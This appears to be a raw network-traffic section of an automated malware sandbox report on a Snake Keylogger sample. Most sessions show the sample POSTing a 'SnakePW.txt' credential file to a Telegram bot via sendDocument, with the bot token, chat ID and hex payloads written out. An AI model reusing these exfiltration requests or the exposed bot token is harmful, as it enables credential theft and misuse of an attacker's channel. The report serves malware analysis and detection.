                            Data Ascii: {"ok":true,"result":{"message_id":67101,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228892,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            314192.168.2.550249149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:52 UTC530OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571f6a7df8
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:52 UTC530OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 66 36 61 37 64 66 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571f6a7df8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:52 UTC531INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:52 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:52 UTC531INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 31 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 39 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67102,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228892,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            315192.168.2.550250149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:52 UTC531OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571fa618cf
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:52 UTC532OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 66 61 36 31 38 63 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571fa618cfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:53 UTC532INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:52 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:53 UTC533INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 31 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 39 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67103,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228892,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            316192.168.2.550251149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:53 UTC533OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571fdf51fa
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:53 UTC533OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 66 64 66 35 31 66 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571fdf51faContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            32192.168.2.549802149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:51 UTC54OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756dc108764
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:51 UTC54OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 63 31 30 38 37 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756dc108764Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:51 UTC54INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:51 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:51 UTC55INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 37 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66779,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228771,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            33192.168.2.549803149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:51 UTC55OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756dc4756f0
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:51 UTC56OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 63 34 37 35 36 66 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756dc4756f0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:52 UTC56INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:52 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:52 UTC56INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66780,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228772,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            34192.168.2.549804149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:52 UTC57OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756dc82f3cd
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:52 UTC57OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 63 38 32 66 33 63 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756dc82f3cdContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:52 UTC58INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:52 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:52 UTC58INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 38 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66781,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228772,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            35192.168.2.549805149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:52 UTC59OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756dccf3dde
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:52 UTC59OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 63 63 66 33 64 64 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756dccf3ddeContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:53 UTC59INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:53 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:53 UTC60INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66782,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228773,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            36192.168.2.549808149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:53 UTC60OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756dd2c38c7
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:53 UTC61OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 64 32 63 33 38 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756dd2c38c7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:54 UTC61INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:54 GMT
                            Content-Type: application/json
                            Content-Length: 509
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
